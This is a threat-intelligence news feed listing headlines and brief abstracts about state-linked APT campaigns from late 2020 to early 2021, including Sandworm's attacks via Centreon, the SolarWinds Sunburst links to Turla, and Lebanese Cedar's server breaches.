French IT Providers Actively Targeted by Russian Sandworm APT Group Full Text
Abstract
The French information security agency (ANSSI) linked Russian group Sandworm with a three-year-long stealthy operation involving a breach of several French entities by exploiting an IT monitoring tool.Cyware Alerts - Hacker News
February 17, 2021
US DoJ charges three members of the North Korea-linked Lazarus APT group Full Text
Abstract
The US DOJ charged three members of the North Korea-linked Lazarus Advanced Persistent Threat (APT) group. The U.S. Justice Department indicted three North Korean military intelligence officials, members of the Lazarus APT group, for their involvement...Security Affairs
February 17, 2021
French Agency ANSSI Warns that Russia-linked Sandworm APT group Targeting Centreon Monitoring Software Full Text
Abstract
The cybersecurity agency of France has recently affirmed that a group of Russian military hackers, acknowledged as the Sandworm group, was behind...Cyber Security News
February 15, 2021
France agency ANSSI links Russia’s Sandworm APT to attacks on hosting providers Full Text
Abstract
French agency ANSSI attributes a series of attacks targeting Centreon servers to the Russia-linked Sandworm APT group. The French security agency ANSSI is warning of a series of attacks targeting Centreon monitoring software used by multiple French...Security Affairs
February 11, 2021
Experts spotted two Android spyware used by Indian APT Confucius Full Text
Abstract
Lookout researchers provided details about two Android spyware families employed by an APT group tracked as Confucius. Researchers at mobile security firm Lookout have provided details about two recently discovered Android spyware families, dubbed...Security Affairs
February 11, 2021
Most Sophisticated BendyBear APT Malware Linked With Chinese Hacking Group BlackTech Full Text
Abstract
During a core investigation, the Unit 42 researchers have discovered a new polymorphic and "highly sophisticated" and well-engineered malware that is named...Cyber Security News
February 09, 2021
New BendyBear APT malware gets linked to Chinese hacking group Full Text
Abstract
Unit 42 researchers today have shared info on a new polymorphic and "highly sophisticated" malware dubbed BendyBear, linked to a hacking group with known ties to the Chinese government.BleepingComputer
February 8, 2021
Domestic Kitten has been conducting surveillance targeting over 1,000 individuals Full Text
Abstract
Iran-linked APT group Domestic Kitten, also tracked as APT-C-50, has been conducting widespread surveillance targeting over 1,000 individuals. Domestic Kitten, also tracked as APT-C-50, is an Iran-linked APT group that has been active at least since...Security Affairs
February 8, 2021
Domestic Kitten hacking group strikes local citizens considered a threat to Iranian regime Full Text
Abstract
Domestic Kitten has been conducting widespread surveillance for the past four years, launching at least 10 separate campaigns and maintaining a target list of 1,200 individuals, at a minimum.ZDNet
February 2, 2021
Lebanese Cedar APT group Attacks ISP Companies Worldwide Full Text
Abstract
Recently, Clearsky researchers have linked the Lebanese Cedar group to a cyber espionage campaign that has targeted several companies worldwide. According...Cyber Security News
February 1, 2021
Hezbollah-Linked Lebanese Cedar APT Infiltrates Hundreds of Servers Full Text
Abstract
Enhanced Explosive RAT and Caterpillar tools are at the forefront of a global espionage campaign.Threatpost
January 29, 2021
Lebanese APT group with suspected links to Hezbollah breached 250 servers worldwide Full Text
Abstract
Some 250 servers were apparently breached by the Lebanese Cedar APT group, an organization with suspected links to the Hezbollah Cyber Unit in Lebanon. The target victims include companies from many countries, including the United States, United Kingdom, Saudi Arabia, Egypt, Jordan, Lebanon, Israel and the Palestinian Authority. Many more companies and organizations have been…SCMagazine
January 29, 2021
Microsoft: North Korea-linked Zinc APT targets security experts Full Text
Abstract
Microsoft, like Google TAG, observed a cyber espionage campaign aimed at vulnerability researchers that it attributed to the North Korea-linked Zinc APT group. Researchers from Microsoft monitored a cyber espionage campaign aimed at vulnerability researchers...Security Affairs
January 28, 2021
Lebanese Cedar APT group broke into telco and ISPs worldwide Full Text
Abstract
Clearsky researchers linked the Lebanese Cedar APT group to a cyber espionage campaign that targeted companies around the world. Clearsky researchers linked the Lebanese Cedar group (aka Volatile Cedar) to a cyber espionage campaign that targeted...Security Affairs
January 15, 2021
What are Chinese APT Groups Up to? Full Text
Abstract
In the wake of several recent attacks, the adoption of ransomware tactics points to the fact that these APT groups are aiming for financial gains as these attacks don’t count as espionage targets.Cyware Alerts - Hacker News
January 12, 2021
BumbleBee Opens Exchange Servers in xHunt Spy Campaign Full Text
Abstract
The BumbleBee web shell allows APT attackers to upload and download files, and move laterally by running commands.Threatpost
January 12, 2021
Researchers Caught a North Korean Group Trying Out a New Hiding Trick Full Text
Abstract
North Korean APT37 group was found targeting the South Korean government in a new campaign using malware that finds its way through the memory of Microsoft Office.Cyware Alerts - Hacker News
January 11, 2021
Researchers see links between SolarWinds Sunburst malware and Russian Turla APT group Full Text
Abstract
While researchers may want to invest time and energy in attributing the latest high-profile attack to a particular adversary, it is more productive to see how the underlying techniques employed in the attack resemble those of prior attacks.SCMagazine
January 11, 2021
Connecting the dots between SolarWinds and Russia-linked Turla APT Full Text
Abstract
Experts have found some similarities between the Sunburst backdoor used in the SolarWinds supply chain attack and Turla's backdoor Kazuar. Security experts from Kaspersky have identified multiple similarities between the Sunburst malware used in the SolarWinds...Security Affairs
January 11, 2021
SolarWinds Hack Potentially Linked to Turla APT Full Text
Abstract
Researchers have spotted notable code overlap between the Sunburst backdoor and a known Turla weapon.Threatpost
January 11, 2021
Sunburst backdoor shares features with Russian APT malware Full Text
Abstract
Kaspersky researchers found that the Sunburst backdoor, the malware deployed during the SolarWinds supply-chain attack, shows feature overlaps with Kazuar, a .NET backdoor tentatively linked to the Russian Turla hacking group.BleepingComputer
January 8, 2021
China-linked APT Groups Picking on Ransomware Attacks Full Text
Abstract
Security researchers shed light on an investigation report involving financially motivated ransomware actors from China targeting multiple companies.Cyware Alerts - Hacker News
January 7, 2021
North Korea-linked APT37 targets South with RokRat Trojan Full Text
Abstract
Experts spotted the RokRat Trojan being used by North Korea-linked threat actors in attacks aimed at the South Korean government. On December 7, 2020, researchers from Malwarebytes uncovered a campaign targeting the South Korean government with a variant...Security Affairs
January 6, 2021
Hacker-for-Hire StrongPity APT Going Global with its New Infrastructure Full Text
Abstract
Experts reveal the StrongPity APT group could have links with state-sponsored campaigns with the ability to search and exfiltrate multiple files or documents from the victim’s machine.Cyware Alerts - Hacker News
January 5, 2021
Chinese APT Group Linked to Ransomware Attacks Full Text
Abstract
APT27 pegged for financially motivated raidsInfosecurity Magazine
January 5, 2021
Experts linked ransomware attacks to China-linked APT27 Full Text
Abstract
Researchers from security firms Profero and Security Joes linked a series of ransomware attacks to the China-linked APT27 group. Security researchers from security firms Profero and Security Joes investigated a series of ransomware attacks against...Security Affairs
January 04, 2021
China’s APT hackers move to ransomware attacks Full Text
Abstract
Security researchers investigating a set of ransomware incidents at multiple companies discovered malware indicating that the attacks may be the work of a hacker group believed to operate on behalf of China.BleepingComputer
January 4, 2021
StrongPity APT Extends Cyberattack Worldwide with its New Infrastructure Full Text
Abstract
StrongPity or Promethium APT, also referred to as APT-C-41, has been active since 2012. It had been first publicly reported in October...Cyber Security News
December 25, 2020
North Korea-linked Lazarus APT targets the COVID-19 research Full Text
Abstract
The North Korea-linked Lazarus APT group has recently launched cyberattacks against at least two organizations involved in COVID-19 research. The North Korea-linked APT group Lazarus has recently launched cyberattacks against two entities involved...Security Affairs
December 23, 2020
Now Fox Kitten APT Deploys Pay2Key Ransomware to Create Panic Full Text
Abstract
The Iranian-backed Fox Kitten hacking group is suspected to be behind the nefarious acts of Pay2Key ransomware that began a new wave of attacks in November-December 2020.Cyware Alerts - Hacker News
December 19, 2020
How the Russian hacking group Cozy Bear, suspected in the SolarWinds breach, plays the long game Full Text
Abstract
As U.S. government agencies and thousands of companies around the world assess whether they’ve been compromised in the SolarWinds breach, security experts are concerned that the full reach of the suspected hackers may only be just coming to light.Cyberscoop
December 17, 2020
CISA: APT group behind US govt hacks used multiple access vectors Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) said that the APT group behind the recent compromise campaign targeting US government agencies used more than one initial access vector.BleepingComputer
December 16, 2020
SideWinder APT: Active and Targeting South-Asian Countries Full Text
Abstract
SideWinder was observed using credential phishing pages copied from their victims’ webmail login pages and modified for phishing targets based in South Asian countries.Cyware Alerts - Hacker News
December 16, 2020
Revisiting APT1 IoCs with DNS and Subdomain Intelligence Full Text
Abstract
Of the 88 domain names publicly attributed to APT1, 28 remain active in the Domain Name System as of 4 December 2020. Of the remaining 23 APT1 domain IoCs, 19 were cited as "malicious" by VirusTotal.CircleID
December 16, 2020
APT Group Targeting Governmental Agencies in East Asia - Avast Threat Labs Full Text
Abstract
The LuckyMouse APT group planted backdoors and keyloggers to gain long-term access to government networks and then uploaded a variety of tools that they used to perform additional activities.Avast
December 15, 2020
Chinese APT Groups Exploiting Corporate Software to Target Mongolian Organizations Full Text
Abstract
The operators behind Operation StealthyTrident have launched supply-chain attacks against hundreds of Mongolian government agencies by exploiting a legitimate software called Able Desktop.Cyware Alerts - Hacker News
December 11, 2020
Facebook unmasks Vietnam’s APT32 hacking group Full Text
Abstract
The Facebook security team has revealed today the real identity of APT32, a Vietnam-backed hacking group active in cyberespionage campaigns targeting foreign governments, multinational corporations, and journalists since at least 2014.BleepingComputer
December 10, 2020
MoleRats APT Returns with Espionage Play Using Facebook, Dropbox Full Text
Abstract
The threat group is increasing its espionage activity in light of the current political climate and recent events in the Middle East, with two new backdoors.Threatpost
December 08, 2020
FireEye Shares Details of Recent Cyber Attack, Actions to Protect Community Full Text
Abstract
FireEye is on the front lines defending companies and critical infrastructure globally from cyber threats. We witness the growing threat firsthand, and we know that cyber threats are always evolving. Recently, we were attacked by a highly sophisticated threat actor, one whose discipline, operational security, and techniques lead us to believe it was a state-sponsored attack. Our number one priority is working to strengthen the security of our customers and the broader community. We hope that by sharing the details of our investigation, the entire community will be better equipped to fight and defeat cyber attacks.
December 01, 2020
Alert (AA20-336A) - Advanced Persistent Threat Actors Targeting U.S. Think Tanks Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have observed persistent continued cyber intrusions by advanced persistent threat (APT) actors targeting U.S. think tanks. This malicious activity is often, but not exclusively, directed at individuals and organizations that focus on international affairs or national security policy.[1] The following guidance may assist U.S. think tanks in developing network defense procedures to prevent or rapidly detect these attacks.
November 30, 2020
Threat actor leverages coin miner techniques to stay under the radar – here’s how to spot them Full Text
Abstract
Cryptocurrency miners are typically associated with cybercriminal operations, not sophisticated nation state actor activity. They are not the most sophisticated type of threats, which also means that they are not among the most critical security issues that defenders address with urgency. Recent campaigns from the nation-state actor BISMUTH take advantage of the low-priority alerts coin miners cause to try and fly under the radar and establish persistence.
October 30, 2020
Alert (AA20-334A) - Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data Full Text